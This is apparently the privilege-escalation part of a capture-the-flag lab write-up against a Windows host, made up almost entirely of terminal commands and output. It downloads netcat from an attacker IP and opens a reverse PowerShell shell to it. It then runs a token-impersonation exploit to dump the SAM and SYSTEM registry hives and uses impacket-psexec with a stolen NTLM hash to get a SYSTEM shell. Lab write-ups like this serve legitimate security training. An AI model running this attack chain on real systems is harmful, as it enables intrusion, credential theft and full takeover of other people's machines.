Priv Esc
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> cd C:\programdata
PS C:\programdata> curl 192.168.45.233/nc.exe -o nc.exe
PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 5/28/2020 10:01 PM Microsoft
d----- 5/25/2020 9:07 AM Microsoft OneDrive
d----- 5/9/2022 4:22 AM Package Cache
d----- 5/25/2020 9:23 AM Packages
d----- 5/9/2022 4:45 AM regid.1991-06.com.microsoft
d----- 3/18/2019 9:52 PM SoftwareDistribution
d----- 5/26/2020 7:44 PM ssh
d----- 5/25/2020 8:44 PM USOPrivate
d----- 5/25/2020 9:01 AM USOShared
d----- 5/9/2022 4:23 AM VMware
d----- 3/18/2019 11:23 PM WindowsHolographicDevices
-a---- 8/16/2024 4:37 PM 59392 nc.exe
PS C:\programdata>
PS C:\programdata> .\nc.exe 192.168.45.233 1338 -e powershell.exe
PS C:\programdata> .\privme.exe -cmd "reg.exe save HKLM\SAM C:\programdata\sam.bak"
.\privme.exe -cmd "reg.exe save HKLM\SAM C:\programdata\sam.bak"
[*] CombaseModule: 0x140724306640896
[*] DispatchTable: 0x140724308983392
[*] UseProtseqFunction: 0x140724308351424
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\7cc4030a-5068-4863-939e-83cd9c76831a\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000fc02-0d40-ffff-87d4-c5ca2e8c7e24
[*] DCOM obj OXID: 0x438547efeb56b29c
[*] DCOM obj OID: 0xc7ce3d93195558de
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 832 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1628
The operation completed successfully.
PS C:\programdata>
PS C:\programdata> .\privme.exe -cmd "reg.exe save HKLM\SYSTEM C:\programdata\system.bak"
.\privme.exe -cmd "reg.exe save HKLM\SYSTEM C:\programdata\system.bak"
[*] CombaseModule: 0x140724306640896
[*] DispatchTable: 0x140724308983392
[*] UseProtseqFunction: 0x140724308351424
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\442203b4-d5fa-44a3-a116-2fcbae3095cf\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000f402-0fac-ffff-d895-26a1a0be0d6d
[*] DCOM obj OXID: 0x1df1e6bd5cea46d1
[*] DCOM obj OID: 0x723731170c8b4772
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 832 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3384
The operation completed successfully.
$ impacket-psexec [email protected] -hashes :f1777d139f9e8721780d5e94136b54ca
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.165.61.....
[*] Found writable share ADMIN$
[*] Uploading file njVKHnDx.exe
[*] Opening SVCManager on 192.168.165.61.....
[*] Creating service HvEA on 192.168.165.61.....
[*] Starting service HvEA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
fc41783718e1b5f8a1a39449590ba16b
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.165.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.165.254
C:\Windows\system32>
Last updated